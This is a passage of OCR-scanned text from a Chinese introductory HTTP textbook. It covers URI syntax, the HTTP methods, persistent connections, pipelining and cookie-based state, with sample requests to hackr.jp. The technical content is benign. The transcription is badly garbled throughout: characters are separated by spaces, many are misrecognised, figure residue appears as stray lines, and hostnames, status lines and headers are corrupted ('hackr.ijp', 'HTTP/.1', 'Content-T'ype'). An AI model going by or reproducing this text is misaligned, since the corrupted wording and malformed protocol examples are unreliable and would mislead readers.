学 习 了 和 HTTP 协议 密 不 可 分 的 TCP/IP 协议 族 中 的 各 种 协议 后 ， 
我 们 再 通过 这 张 图 来 了 解 下 IP 协议 、TCP 协议 和 DNS 服务 在 使 用 
HTTP 协议 的 通信 过 程 中 各 自发 挥 了 哪些 作用 。 
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所 
JE 
| 站 | i 


rm 证 中 1aCK 站 5 I 
Sidr ena le / Wel : 





告诉 我 hackr.jp 的 IP 地 址 吧 









hackr.jp 对 应 的 IP 地 址 是 
20X.189.105.112 DNS 





HTTP 协 议 的 职责 
i 8 服务 器 的 HTTP 请 求 报 文 


TCP 协 议 的 职责 
为 了 方便 通信 ， 将 HTTP 请 求 报 文 分 割 成 报 文 段 
EE 中 几 | 按 序号 分 为 多 个 
天 报 文 段 
把 每 个 报 文 段 可靠 地 传 给 对 广 





IP 协 议 的 职责 
搜索 对 方 的 地 址 ， 一 边 中 转 一 边 传送 













TCP 协 议 的 职责 
从 对 方 那里 接收 和 的 报 让 






ee 
重组 请 求 报 文 












HTTP 协 议 的 职责 
< Web 加 二 至 求 的 EE 处理 








1IP 地 址 
20X.189.105.112 





hackr.jp 
服务 器 


党 协 让 用 户 关外 舍 ， 
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1.7 URI 和 URL 


与 URI (统一 资源 标识 和 伯 ) 相 比 ， 我 们 更 熟悉 URL ( Uniform 
Resource Locator， 统 一 资源 定位 符 )。URL 正 是 使 用 Web 浏览 硕 等 访问 
Web 页 面 时 需要 输入 的 网 页 地 址 。 比 如 ， 下 图 的 http://hackrjp/ 就 是 URL。 





1.7.1 统一 资源 标识 符 
URI 是 Uniform Resource Identifier 的 缩写 。RFC2396 分 别 对 这 
3 个 单词 进行 了 如 下 定义 。 
Uniform 
规定 统一 的 格式 可 方便 处 理 多 种 不 同类 型 的 资源 ， 而 不 用 根据 上 下 
文 环境 来 识别 资源 指定 的 访问 方式 。 男 外 ， 加 入 新 增 的 协议 方案 
( 如 http: 或 ftp: ) 也 更 容易 。 


Resource 

资源 的 定义 是 “可 标识 的 任何 东西 "。 除 了 文档 文件 、 图 像 或 服务 
(例如 当天 的 天 气 预 报 ) 等 能 够 区 别 于 其 他 类 型 的 ， 全 都 可 作为 资 
源 。 另 外 ， 资 源 不 仅 可 以 是 单一 的 ， 也 可 以 是 多 数 的 集合 体 。 
Identifier 


表示 可 标识 的 对 象 。 也 称 为 标识 符 。 


综 上 所 述 ，URI 就 是 由 某 个 协议 方案 表示 的 资源 的 定位 标识 符 。 协 
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一 二 一 


议 方案 是 指 访问 资源 所 使 用 的 协议 类 型 名 称 。 

采用 HTTIP 协 议 时 ， 协 议 方 案 就 是 http。 除 此 之 外 ， 还 有 他、 
mailto 、telnet、file 等 。 标 准 的 URI 协议 方案 有 30 种 左右 ， 由 隶属 于 国 
际 互联 网 资源 管理 的 非 营 利 社 团 ICANN ( Internet Corporation for Assiened 
Names and Numbers， 互 联网 名 称 与 数字 地 址 分 配 机 构 ) 的 IANA 
( Internet Assigned Numbers Authority， 互 联网 号 码 分 配 局 ) 管理 颁布 。 


|ANA - Uniform Resource Identifier (URI) SCHEMES ( 统一 资 
源 标 识 符 方案 ) 


http://www.lana.ore/asslgnments/url-SCchemes 


URI 用 字符 串 标 识 某 一 互联 网 资源 ， 而 URL 表示 资源 的 地 点 ( 互 
联网 上 所 处 的 位 置 )。 可 见 URL 是 URI 的 子 集 。 

“RFC3986: 统一 资源 标识 符 ( URI ) 通用 语法 ”中 列举 了 几 种 URI 
例子 ， 如 下 所 示 。 


ftp://ftp.is.co.2a/rfc/rfcl1808.txt 
http://www.ietf.org/rfc/rfc2396.txt 
: ldap://[2001:db8::7]/c=GB?objectClass?one 
mailto:John.Doe@example.com z 
news :comp.infosystems .www.servers .unix 
tel:+1-816-555-1212 
telnet://192.0.2.16:80/ 
urn:oasis:names:specification:docbook:dtd:xml:4.1.2 


本 书 接 下 来 的 章节 中 会 频繁 出 现 URI 这 个 术语 ， 在 充分 理解 的 基 
础 上 ， 也 可 用 URL 和 蔡 换 URI。 
1.7.2 ”URI 格式 


表示 指定 的 URI， 要 使 用 涵盖 全 部 必要 信息 的 绝对 URI、 绝 对 URL 
以 及 相对 URL。 相 对 URL， 是 指 从 浏览 器 中 基本 URI 处 指定 的 URL， 











形 如 /image/logo.gif, 
让 我 们 先 来 了 解 一 下 绝对 URI 的 格式 。 






http://user:pass@www.example.jp:80/dir/index.htm?uid=1#ch1 


协议 ”登录 信息 服务 器 地 址 带 层 次 的 文件 路 径 | 片段 标识 符 
方案 名 ( 认证 ) 服务 器 端口 号 查询 字符 串 
使 用 http: 或 https: 等 协议 方案 名 获取 访问 资源 时 要 指定 协议 类 型 。 
不 区 分 字母 大 小 与 ， 最 后 附 一 个 冒号 (: )。 
也 可 使 用 data: 或 javascript: 这 类 指定 数据 或 脚本 程序 的 方案 名 。 


登录 信息 ( 认证 ) 
指定 用 户 名 和 密码 作为 从 服务 顺 问 获取 资源 时 必要 的 登录 信息 ( 身 
份 认证 )。 此 项 是 可 选项 。 


服务 器 地 址 

使 用 绝对 URI 必须 指定 待 访问 的 服务 器 地 址 。 地 址 可 以 是 类 似 
hackrjp 这 种 DNS 可 解析 的 名 称 ， 或 是 192.168.1.1 这 类 IPv4 地 址 
和 名， 还 可 以 是 [0:0:0:0:0:0:0:1] 这 样 用 方 括号 括 起 来 的 IPv6 地 址 名 。 
服务 希 端 口号 

指定 服务 器 连接 的 网 络 端口 号 。 此 项 也 是 可 选项 ， 者 用 户 省 略 则 自 
动 使 用 默认 端口 号 。 


市 层次 的 文件 路 径 

指定 服务 器 上 的 文件 路 径 来 定位 特 指 的 资源 。 这 与 UNIX 系统 的 文 
件 目录 结构 相似 。 

查询 字符 串 


针对 已 指定 的 文件 路 径 内 的 资源 ， 可 以 使 用 查询 字符 串 传 人 任意 参 
数 。 此 项 可 选 。 
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片段 标识 符 
使 用 片段 标识 符 通常 可 标记 出 已 获取 资源 中 的 子 资源 (文档 内 的 
东 个 位 置 )。 但 在 RFC 中 并 没有 明确 规定 其 使 用 方法 。 该 项 也 为 


入 
时 


可 选项 。 
于 贸 
起 中 
并 不 是 所 有 的 应 用 程序 都 符合 RFC 

有 一 些 用 来 制定 HTTP 协议 技术 标准 的 文档 ， 它 们 被 称 为 RFC 
( Request for Comments， 征 求 修正 意见 书 )。 | 

通常 ， 应 用 程序 会 遵照 由 RFC 确定 的 标准 实现 。 可 以 说 ， RFC 是 互 
联网 的 设计 文档 , 要 是 不 按照 RFC 标准 执行 ， 就 有 可 能 导致 无 法 通信 的 
状况 。 比 如 ， 有 一 台 Web 服务 器 内 的 应 用 服务 没有 遵照 RFC 的 标准 实现 ， 
那 Web 浏览 器 就 很 可 能 无 法 访问 这 台 服 务 器 了 。 

由 于 不 遵照 RFC 标准 实现 就 无 法 进行 HTTP 协议 通信 ， 所 以 基本 上 
客户 端 和 服务 器 端 都 会 以 RFC 为 标准 来 实现 HTTP 协议 。 但 也 存在 某 些 
应 用 程序 因 客户 端 或 服务 器 端的 不 同 ， 而 未 遵照 RFC 标准 ， 反 而 将 自 成 
一 套 的 “标准 ”扩展 的 情况 。 

不 按 RFC 标准 来 实现 ， 当 然 也 不 必 劳 心 费 力 让 自己 的 “标准 ”符合 
其 他 所 有 的 客户 端 和 服务 器 端 。 但 设想 一 下 ， 如 果 这 款 应 用 程序 的 使 用 者 
非常 多 ， 那 会 发 生 什 么 情况 ? 不 难 想象 ， 其 他 的 客户 端 或 服务 器 端 必然 都 
不 得 不 去 配合 它 。 

实际 在 互联 网 上 ， 已 经 实现 了 HTTP 协议 的 一 些 服务 器 端 和 客户 端 
里 就 存在 上 述 情况 。 说 不 定 它 它们 会 与 本 书 介绍 的 HTTP 协议 的 实现 情况 不 
一 样 。 

本 书 接 下 来 要 介绍 的 HTTP 协议 内 容 除去 部 分 例外 ， 基本 上 都 以 
RFC 的 标准 为 小 s 
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第 2 章 
简单 的 HTTP 协 议 


本 章 将 针对 HTTP 协 议 结构 进行 讲解 ， 主 要 使 用 HTTP/1.1 版 本 。 学 
完 这 章 ， 想 必 大 家 就 能 理解 HTTP 协 议 的 基础 了 。 





aa 


2.1 HTTP 协议 用 于 客户 端 和 服务 器 端 之 间 的 通信 


HTTP 协议 和 TCP/P 协议 族 内 的 其 他 众多 的 协议 相同 ， 用 于 客户 
闪 和 服务 需 之 间 的 通信 。 

请 求 访 问 文本 或 图 像 等 资源 的 一 端 称 为 客户 端 ， 而 提供 资源 响应 的 
一 端 称 为 服务 器 端 。 


\ 我 是 服 务 避 





服务 器 


图 : 应 用 HTTP 协议 时 ， 必 定 是 一 端 担任 客户 端 角色 ， 另 一 端 担任 服务 器 端 角 色 


在 两 合计 算 机 之 间 使 用 HTTP 协议 通信 时 ， 在 一 条 通信 线路 上 必定 
有 一 病 是 客户 端 ， 另 一 端 则 是 服务 器 端 。 

有 时 候 ， 按 实际 情况 ， 两 全 计算 机 作为 客户 端 和 服务 器 端的 角色 有 
可 能 会 互 换 。 但 就 仅 从 一 条 通信 路 线 来 说 ， 服 务 器 端 和 客户 端的 角色 是 
确定 的 ， 而 用 HTTP 协议 能 够 明确 区 分 哪 端 是 客户 端 ， 哪 端 是 服务 器 端 。 


2.2 ”通过 请 求 和 响应 的 交换 达成 通信 





Ed 


客户 庙 服务 器 


图 : 请 求 必定 由 客户 端 发 出 ， 而 服务 器 端 回复 响应 
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HTTP 协 以 规定 ， 请 求 从 客户 端 发 出 ， 最 后 服务 器 端 响应 该 请 求 并 
退回 。 换 句 话 说， 肯定 是 先 从 客户 端 开 始 建立 通信 的 ， 服 务 需 端 在 没有 
接收 到 请 求 之 前 不 会 发 送 响 应 。 

下 面 ， 我 们 来 看 一 个 具体 的 示例 。 
发送 请 来 
GET / HTTP/1.1 
Host : hackr. jp 





服务 比 习 发 送 响应 
HTTP/1.1 200 OK 
Date: Tue, 10 Jul 2012 06:50:15 GMT 
Content-Length: 362 
Content-Type: text/html 
<html> 

下 面 则 是 从 客户 端 发 送 给 某 个 HTTP 服务 器 端的 请 求 报 文中 的 
内 容 。 


GET /index.htm HTTP/1.1 
Host: hackr.ijp 


起 始 行 开头 的 GET 表示 请 求 访问 服务 器 的 类 型 称 为 方法 
( method )。 随 后 的 字符 串 /index.htm 指明 了 请 求 访 问 的 资源 对 象 ， 也 叫 
做 请 求 URI ( request-URI )。 最 后 的 HTTP/1.1， 即 HTTP 的 版 本 号 ， 用 
来 提示 客户 端 使 用 的 HTTP 协议 功能 。 

综合 来 看 ， 这 段 请 求 内 容 的 意思 是 : 请 求 访问 某 台 HTTP 服务 器 上 
的 /index.htm 页 面 资 源 。 

请 求 报 文 是 由 请 求 方法 、 请 求 URI、 协 议 版 本 、 可 选 的 请 求 首 部 字 
段 和 内 容 实体 构 成 的 。 


方法 URI 协议 版 本 


POST /form/entry HTTP/1.1 请 求 首部 字段 


Host: hackr.jp 

Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 16 


name=Ueno&kage=31 


内 容 实体 


图 : 请 求 报 文 的 构成 


请 求 首部 字段 及 内 容 实体 稍 后 会 作 详 细 说 明 。 接 下 来 我 们 继续 讲 
解 。 接 收 到 请 求 的 服务 咒 ， 会 将 请 求 内 容 的 处 理 结果 以 啊 应 的 形式 返回 。 


HTTP/1.1 200 OK 

Date: Tue, 10 Jul 2012 06:50:15 GMT 
Content-Length: 362 

Content-Type: text/html 


证 - 届 前 中 十 而 


在 起 始 行 开头 的 HTTP/1.1 表示 服务 器 对 应 的 HTTP 版 本 。 

紧 挨 着 的 200 OK 表示 请 求 的 处 理 结果 的 状态 码 〈 status code ) 和 原 
因 短 语 ( reason-phrase )。 下 一 行 显示 了 创建 啊 应 的 日 期 时 间 ， 是 让 部 字 
段 (header field ) 内 的 一 个 属性 。 

接着 以 一 空 行 分 隔 ， 之 后 的 内 容 称 为 资源 实体 的 主体 (entity 
body )。 

啊 应 报 文 基本 上 由 协议 版 本 、 状 态 码 ( 表示 请 求 成 功 或 失败 的 数字 
代码 )、 用 以 解释 状态 码 的 原因 短语 、 可 选 的 啊 应 首部 字段 以 及 实体 主 
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体 构成 。 稍 后 我 们 会 对 这 些 内 容 进 行 详细 说 明 。 


| 状态 码 的 原因 短语 
协议 版 本 。 状态 码 

\ 响应 首部 字段 
HTTP/1.1 200 OK 
Date: Tue, 10 Jul 2012 06:50:15 GMT 
Content-Length: 362 
Content-Type: text/html 


<html> 


Di 


se 
主体 


图 : 响应 报 文 的 构成 


2.3 HTTP 是 不 保存 状态 的 协议 

HTTP 是 一 种 不 保存 状态 ， 即 无 状态 ( stateless ) 协议 。HTTP 协议 
自身 不 对 请 求 和 响应 之 间 的 通信 状态 进行 保存 。 也 就 是 说 在 HTTP 这 个 
级 别 ， 协 议 对 于 发 送 过 的 请 求 或 啊 应 都 不 做 持久 化 处 理 。 










什么 给 你 来 着 ? 


图 : HTTP 协议 自身 不 具备 保存 之 前 发 送 过 的 请 求 或 响应 的 功能 


使 用 HTTP 协议 ， 每 当 有 新 的 请 求 发 送 时 ， 就 会 有 对 应 的 新 响应 产 
生 。 协 议 本 身 并 不 保留 之 前 一 切 的 请 求 或 响应 报 文 的 信息 。 这 是 为 了 更 








快 地 处 理 大量 事 务 ， 确 保 协议 的 可 伸缩 性 ， 而 特意 把 HTTP 协议 设计 成 
如 此 简单 的 。 

可 是 ， 随 着 Web 的 不 断 发 展 ， 因 无 状态 而 导致 业务 处 理 变 得 棘手 
的 情况 增多 了 。 比 如 ， 用 户 登录 到 一 家 购物 网 站 ， 即 使 他 跳 转 到 该 站 的 
其 他 页 面 后 ， 也 需要 能 继续 保持 登录 状态 。 针 对 这 个 实例 ， 网 站 为 了 能 
够 掌握 是 谁 送出 的 请 求 ， 需 要 保存 用 户 的 状态 。 

HTTP/1.1 虽然 是 无 状态 协议 ， 但 为 了 实现 期 望 的 保持 状态 功能 ， 
于 是 引入 了 Cookie 技术 。 有 了 Cookie 再 用 HTTP 协议 通信 ， 就 可 以 管 
理 状 态 了 。 有 关 Cookie 的 详细 内 容 稍 后 讲解 。 


2.4 请 求 URI 定位 资源 


HTTP 协议 使 用 URI 定位 互联 网 上 的 资源 。 正 是 因为 URI 的 特定 功 
能 ， 在 互联 网 上 任意 位 置 的 资源 都 能 访问 到 。 


URI _ 有 A 
http://www.usagidesign.jp/photo/usagiihtm 


URI 


Tr ee iB > 











URI 
http://www.example.com/auth/index.htm 





Www.example.com 


图 : HTTP 协议 使 用 URI 让 客户 端 定位 到 资源 
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当 客户 端 请 求 访问 资源 而 发 送 请 求 时 ，URI 需要 将 作为 请 求 报 文 中 
的 请 求 URI 包含 在 内 。 指 定 请 求 URI 的 方式 有 很 多 。 
“ URI 为 完整 的 请 求 URI 





* 在 首部 字段 Host 中 写 明 网 络 域名 或 IP 地 址 


GET /index.htm HTTP/1,1 
Host: hackr.jp 


图 : 以 http://hackr.jp/index.htm 作为 请 求 的 例子 
除 此 之 外 ， 如 果 不 是 访问 特定 资源 而 是 对 服务 右 本 和 号 发 起 请 求 ， 可 


以 用 一 个 * 来 代替 请 求 URI。 下 面 这 个 例子 是 查询 HTTP 服务 器 端 支 持 
的 HTTP 方法 种 类 。 


OPTIONS * HTTP/1.1 


2.5 ”告知 服务 器 意图 的 HTTP 方法 
下 面 ， 我 们 介绍 HTTP/1.1 中 可 使 用 的 方法 。 


GET : 获取 资源 

GET 方法 用 来 请 求 访问 已 被 URI 识别 的 资源 。 指 定 的 资源 经 服务 
大 疝 解析 后 返回 啊 应 内 容 。 也 就 是 说 ， 如 果 请 求 的 资源 是 文本 ， 那 就 保 
持原 样 返回 ; 如 果 是 像 CGI ( Common Gateway Interface， 通 用 网 关 接 
口 ) 那样 的 程序 ， 则 返回 经 过 执行 后 的 输出 结果 。 


J I 





使 用 GET 方法 的 请 求 响应 的 例子 


GET /index.html HTTP/1.1 
Host: www.hackr.jp 


GET /index.html HTTP/1.1 
Host: www.hackr.jp 
If-Moditfied-Since: Thy, 12 Jul 2012 07:30:00 GMT 


ls | 仅 返回 2012 年 7 月 12 日 7 点 30 分 以 后 更 新 过 的 index.html 页 面 资源 。 
| 如 果 未 有 内 容 更 新 ， 则 以 状态 码 304 Not Modified 作为 响应 返回 





POST : 传输 实体 主体 

POST 方法 用 来 传输 实体 的 主体 。 

虽然 用 GET 方法 也 可 以 传输 实体 的 主体 ， 但 一 般 不 用 GET 方法 进 
行 传输 ， 而 是 用 POST 方法。 虽说 POST 的 功能 与 GET 很 相似 ,但 
POST 的 主要 目的 并 不 是 获取 响应 的 主体 内 容 。 


我 要 把 这 条 
信息 告诉 你 ! 
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使 用 POST 方法 的 请 求 * 响应 的 例子 


POST /submit.cgi HTTP/1.1 
Host: www.hackr.jp 


Content-Length: 1560 ( 1560 字 节 的 数据 ) 
返回 submit.cgi 接 收 数据 的 处 理 结果 





PUT : 传输 文件 

PUT 方法 用 来 传输 文件 。 就 像 FTP 协议 的 文件 上 传 一 样 ， 要 求 在 
请 求 报 文 的 主体 中 包含 文件 内 容 ， 然 后 保存 到 请 求 URI 指定 的 位 置 。 

但 是 ， 鉴 于 HTTP/1.1 的 PUT 方法 自身 不 带 验 证 机 制 ， 任 何人 都 可 
以 上 传 文件 ,存在 安全 性 问题 ， 因 此 一 般 的 Web 网 站 不 使 用 该 方法 。 兰 
配合 Web 应 用 程序 的 验证 机 制 ， 或 架构 设计 来 用 REST( REpresentational 
State Transfer， 表 征 状 态 转移 ) 标准 的 同类 Web 网 站 ， 就 可 能 会 开放 使 
用 PUT 方法 。 








我 要 怒 这 份 
文件 传 给 你 ! 





使 用 PUT 方法 的 请 求 ， 响应 的 例子 


PUT /example.html HTTP/1.1 
Host: www.hackr.jp 
Content-T'ype: text/html 


Content-Length: 1560 | 1560 字 节 的 数据 ) 


响应 返回 状态 码 204 No Enieni ( 比如 : 该 htm 已 存在 于 服务 器 上 | 





山 响应 的 意思 其 实 是 请 求 执行 成 功 了 ， 但 无 数据 返回 。 一 一 译 者 注 


各 周 半 局 加 
枉 用 图 
属 醒 大 - 


HEAD: 获得 报 文 首部 
HEAD 方法 和 GET 方法 一 样 ， 只 是 不 返回 报 文 主体 部 分 。 用 于 确认 
URI 的 有 效 性 及 资源 更 新 的 日 期 时 间 等 。 





图 : 和 GET 一样， 但 不 返回 报 文 主体 


使 用 HEAD 方法 的 请 求 响应 的 例子 


HEAD /index.html HTTP/1.1 
Host: www.hackr.,jp 


030 





DELETE: 删除 文件 

DELETE 方法 用 来 删除 文件 ， 是 与 PUT 相反 的 方法 。DELETE 方 
法 按 请 求 URI 删除 指定 的 资源 。 

但 是 ，HTTP/1.1 的 DELETE 方法 本 身 和 PUT 方法 一 样 不 带 验 证 机 
制 ， 所 以 一 般 的 Web 网 站 也 不 使 用 DELETE 方法 。 当 配合 Web 应 用 程 
序 的 验证 机 制 ， 或 遵守 REST 标准 时 还 是 有 可 能 会 开放 使 用 的 。 


| 产 柜 那 份 文件 
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使 用 DELETE 方法 的 请 求 * 响应 的 例子 


DELETE /example.html HTTP/1.1 
Host: www.hackr.jp 





OPTIONS: 询问 支持 的 方法 
OPTIONS 方法 用 来 查 词 针 对 请 求 URI 指定 的 资源 文 持 的 方法 。 







支持 GET 和 
HEAD 方 注 


~ OPTIONS 


请 求 * 响应 的 例子 


~ | OPTIONS * HTTP/1.1 
| Host Www.hackr.Ip 





| HTTP/.1 200 OK 
Allow: GET POST HEAD, OPTIONS 
( 返回 服务 器 支持 的 方法 ) 





TRACE: 追踪 路 径 

TRACE 方法 是 让 Web 服务 器 端 将 之 前 的 请 求 通信 环 回 给 客户 端的 

发 送 请 求 时 ， 在 Max-Forwards 首部 字段 中 填 人 数值 ， 每 经 过 一 个 
服务 器 端 就 将 该 数字 减 1， 当 数值 刚好 减 到 0 时 ， 就 停止 继续 传输 ， 最 
后 接收 到 请 求 的 服务 器 端 则 返回 状态 码 200 OK 的 响应 。 

客户 端 通过 TRACE 方法 可 以 查询 发 送出 去 的 请 求 是 怎样 被 加 工 修 
改 / 自 改 的 。 这 是 因为 ， 请求 想 要 连接 到 源 目标 服务 器 可 能 会 通过 代理 
中 转 ，TRACE 方法 就 是 用 来 确认 连接 过 程 中 发 生 的 一 系列 操作 。 


a 


ee 
| 丁丁 着 ， 


但 是 ，TRACE 方法 本 来 就 不 怎么 常用 ， 再 加 上 它 容 易 引 发 XST 
( Cross-Site Tracing， 跨 站 追踪 ) 攻击 ， 通 常 就 更 不 会 用 到 了 。 







之 后 插 会 发 生 些 、\ 从 代理 服务 器 路 由 中 转 时 请 我 收 到 的 是 


什么 吃 ? 可 能 被 自 改 





代理 服务 器 代理 服务 器 


» Max-Forwards: 2 ww Max-Forwards: 1° Max-Forwards: 0 = 


使 用 TRACE 方法 的 请 求 * 响应 的 例子 


' TRACE / HTTP/1.1 
请 求 Host: hackr.jp 
| Max-Forwards: 2 


HTTP/.1 200 OK 
Content-Type: message/http 





Content-Length: 1024 


TRACE / HTTP/1.1 
Host: hackr.jp 
Max-Forwards: 2 | 返回 响应 包含 请 求 内 容 ) 


CONNECT: 要 求 用 隧道 协议 连接 代理 

CONNECT 方法 要 求 在 与 代理 服务 器 通信 时 建立 隧道 ， 实 现 用 隧道 
协议 进行 TCP 通信 。 主 要 使 用 SSL ( Secure Sockets Layer， 安 全 套 接 
层 ) 和 TLS (Transport Layer Security， 传 输 层 安全 ) 协议 把 通信 内 容 加 
密 后 经 网 络 隧道 传输 。 

CONNECT 方法 的 格式 如 下 所 示 。 


CONNECT 代理 服务 器 名 : 端口 号 HTTP 版 本 
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使 用 CONNECT 方法 的 请 求 * 响应 的 例子 


| CONNECT proxy.hackr.jp:8080 HTTP/1.1 
Host: proxy.hackr.jp 





HTTP/1.1 200 OK ( 之 后 进入 网 络 隧道 ) 


2.6 ”使 用 方法 下 达 命 令 


问 请 求 URI 指定 的 资源 发 送 请 求 报 文 时 ， 采 用 称 为 方法 的 命令 。 
方法 的 作用 在 于 ， 可 以 指定 请 求 的 资源 按期 望 产 生 某 种 行为 。 方 法 
中 有 GET、POST 和 HEAD 等 。 














CET 方法 
请 给 我 那个 思源 ! 


“PUT 方法 
我 发 文件 过 来 啦 * 






A HEAD 方法 
告诉 我 通信 的 左 





图 : 使 用 方法 给 服务 器 下 达 命 令 


下 表 列 出 了 HTTP/1.0 和 HTTP/1.1 支持 的 方法 。 男 外 ,方法 名 区 分 
大 小 写 ， 注 意 要 用 大 写字 母 。 









- 








TE 1 


LINK “| 建立 和 资源 之 间 的 联系 
断 开 连 接 关系 
在 这 里 列举 的 众多 方法 中 ，LINK 和 UNLINK 已 被 HTTP/1.1 废弃 ， 

不 再 支持 。 


2.7 持久 连接 节省 通信 和 量 
HTTP 协议 的 初始 版 本 中 ， 每 进行 一 次 HTTP 通信 和 就 要 断 开 一 次 
TCP 连接 。 


建立 TCP 连 接 








断 开 TCP 连接 | 
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一 一 一 一 一 一 一 





以 当年 的 通信 情况 来 说 ， 因 为 都 是 些 容 量 很 小 的 文本 传输 ， 所 以 即 
使 这 样 也 没有 多 大 问题 。 可 随 着 HTTP 的 普及 ， 文 档 中 包含 大 量 图 片 的 
情况 多 了 起 来 。 

比如 ,使 用 浏览 器 浏览 一 个 包含 多 张 图片 的 HTML 页 面 时 ， 在 发 
送 请 求 访问 HTML 页 面 资源 的 同时 ， 也 会 请 求 该 HTML 页 面 里 包含 的 
其 他 资源 。 因 此 ， 每 次 的 请 求 都 会 造成 无 谓 的 TCP 连接 建立 和 断 开 ， 
增加 通信 量 的 开销 。 


| 发 送 请 求 一 份 包含 多 张 图 

片 的 HTML 文 档 对 应 的 

= | | Web 页 面 , 会 产生 大 量 的 
:二 | | 通信 开销 。 












建立 TCP 连 接 
HTTP 请 求 /响应 


国医 面 慎 国 
| 加 国民 
加 古 硬 - 


2.7.1 持久 连接 
为 解决 上 述 TCP 连接 的 问题 ，HTTP/1.1 和 一 部 分 的 HTTP/1.0 想 出 
了 持久 连接 ( HTTP Persistent Connections， 也 称 为 HTTP keep-alive 或 


HTTP connection reuse ) 的 方法 。 持 久 连 接 的 特点 是 ， 只 要 任意 一 病 没 
有 明确 提出 断 开 连接 ， 则 保持 TCP 连接 状态 。 


建立 TCP 连 接 





一 一 一 SYN 一 一 一 ， 
条- 一 一 一 一 SYN/ACK 










村 建立 这 接 就 能 
一 况 性 发 送 请 求 出 
电源 






Wab 页 面 由 打开 
中 度 恋 4 快 了 ! 





断 开 TCP 连 接 | 


图 : 持久 连接 有 在 建立 1 次 TCP 连接 后 进行 多 次 请 求 和 响应 的 交互 


持久 连接 的 好 处 在 于 减少 了 TCP 连接 的 重复 建立 和 断 开 所 造成 的 
额外 开销 ， 减 轻 了 服务 器 端的 负载 。 另 外 ， 减 少 开销 的 那 部 分 时 间 ， 使 
HTTP 请 求 和 响应 能 够 更 早 地 结束 ， 这 样 Web 页 面 的 显示 速度 也 就 相应 
提高 了 。 

在 HTTP/1.1 中 ， 所 有 的 连接 默认 都 是 持久 连接 ,但 在 HTTP/1.0 内 
并 未 标准 化 。 虽 然 有 一 部 分 服务 器 通过 非 标准 的 手段 实现 了 持久 连接 ， 
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但 服务 希 闪 不 一 定 能 够 文 持 持久 连接 。 毫 无 疑问 ， 除 了 服务 需 端 ， 客 户 
端 也 需要 文 持 持久 连接 。 


2.7.2 ”管线 化 

持久 连接 使 得 多 数 请 求 以 管线 化 ( pipelining ) 方式 发 送 成 为 可 能 。 
从 前 发 送 请 求 后 需 等 待 并 收 到 响应 ,才能 发 送 下 一 个 请 求 。 管 线 化 技术 
出 现 后 ， 不 用 等 待 啊 应 亦 可 直接 发 送 下 一 个 请 求 。 

这 样 就 能 够 做 到 同时 并 行 发 送 多 个 请 求 ， 而 不 需要 一 个 接 一 个 地 等 
待 啊 应 了 。 





不 用 季 待 让 能 直 持 ) 
发 送 下 一 个 请 求 ! 






建立 TCP 连 接 


| 断 开 TCP 连 接 | 





图 : 不 等 待 响应 ， 直 接 发 送 下 一 个 请 求 


比如 ， 当 请 求 一 个 包含 10 张 图 片 的 HTML Web 页面 ， 与 挨个 连接 
相 比 ， 用 持久 连接 可 以 让 请 求 更 快 结束 。 而 管线 化 技术 则 比 持久 连接 还 
要 快 。 请 求 数 越 多 ， 时 间 差 就 越 明 显 。 


2.8 使 用 Cookie 的 状态 管理 


HTTP 是 无 状态 协议 ， 它 不 对 之 前 发 生 过 的 请 求 和 啊 应 的 状态 进行 
管理 。 也 就 是 说 ， 无 法 根据 之 前 的 状态 进行 本 次 的 请 求 处 理 。 

假设 要 求 登 录 认 证 的 Web 页 面 本 身 无 法 进行 状态 的 管理 (不 记录 
已 登录 的 状态 )， 那 么 每 次 跳 转 新 页 面 不 是 要 再 次 登录 ， 就 是 要 在 每 次 





a 


请 求 报 文中 附加 参数 来 管理 登录 状态 。 

不 可 否认 ， 无 状态 协议 当然 也 有 它 的 优点 。 由 于 不 必 你 和 存 状 态 ， 目 
然 可 减少 服务 器 的 CPU 及 内 存 资 源 的 消耗 。 从 男 一 侧面 来 说 ， 也 正 是 
因为 HTTP 协议 本 号 是 非常 简单 的 ， 所 以 才 会 被 应 用 在 各 种 场景 里 。 


让 我 一 一 记 和 住 你 





服务 荷 
图 : 如 果 让 服务 器 管理 全 部 客户 端 状 态 则 会 成 为 负担 


保留 无 状态 协议 这 个 特征 的 同时 又 要 解决 类 似 的 矛盾 问题 ， 于 是 引 
入 了 Cookie 技术 。Cookie 技术 通过 在 请 求 和 啊 应 报 文中 写 人 Cookie 信 
息 来 控制 客户 端的 状态 。 

Cookie 会 根据 从 服务 器 端 发 送 的 啊 应 报 文 内 的 一 个 叫做 Set-Cookie 
的 首部 字段 信息 ， 通 知客 户 端 保存 Cookie。 当 下 次 客户 端 再 往 该 服务 器 
发 送 请 求 时 ， 客 户 端 会 自动 在 请 求 报 文 中 加 入 Cookie 值 后 发 送出 去 。 

服务 器 端 发 现 客户 端 发 送 过 来 的 Cookie 后 ， 会 去 检查 究竟 是 从 哪 
一 个 客户 端 发 来 的 连接 请 求 ， 然 后 对 比 服务 器 上 的 记录 ， 最 后 得 到 之 前 
的 状态 信息 。 
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生成 Cookie 
记 住 是 向 谁 发 送 的 


和 保存 请 求 








日 2) 在 响应 中 添加 Cookie 后 返回 
二 一 一 一 一 一 一 啊 应 
客户 端 

保存 Cookie + 


二 





Cookie 


El 
8 第 2 次 以 后 ( 存 有 Cookie 信息 状态 ) 的 请 求 


二 ee 4 检查 Cookie 
(3 请 求 中 添加 Cookie 后 发 送 








+ 人 一 
Cookie 





啊 ， 是 刚才 的 


那 守 化 





上 图 展示 了 发 生 Cookie 交互 的 情景 ，HTTP 请 求 报 文 和 啊 应 报 文 的 
内 容 如 下 。 


1 请 求 报 文 ( 没有 Cookie 信息 的 状态 ) 


GET /reader/ HTTP/1.1 
Host: hackr.jp 
* 首部 字段 内 没有 Cookie 的 相关 信息 


2 了 响应 报 文 ( 服务 器 端 生成 Cookie 信息 ) 


HTTP/1.1 200 OK 

Date; Thu, 12 Jul 2012 07:]2:20 GMT 

Server: Apache 

< Set-Cookie: sid=1342077140226724; path=/; expires=Wed, 一 
10-Oct-12 07:12:20 GMT > 

Content-Type: text/plain; charset=UTF-8 


3 请 求 报 文 ( 自动 发 送 保存 着 的 Cookie 信息 ) 


GET /image/ HTTP/1.1 
Host: hackr.jp 
Cookie: aid=1342077140226724 


有 关 请 求 报 文 和 响应 报 文 内 Cookie 对 应 的 首部 字段 ， 请 参考 之 后 


的 章节 。 
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HTTP 通 信 过 程 包括 从 客户 端 发 往 服务 器 端的 请 求 及 从 服务 器 端 
返回 客户 端的 响应 。 本 章 就 让 我 们 来 了 解 一 下 请 求 和 响应 是 怎样 
运作 的 。 











3.1 HTTP 报 文 


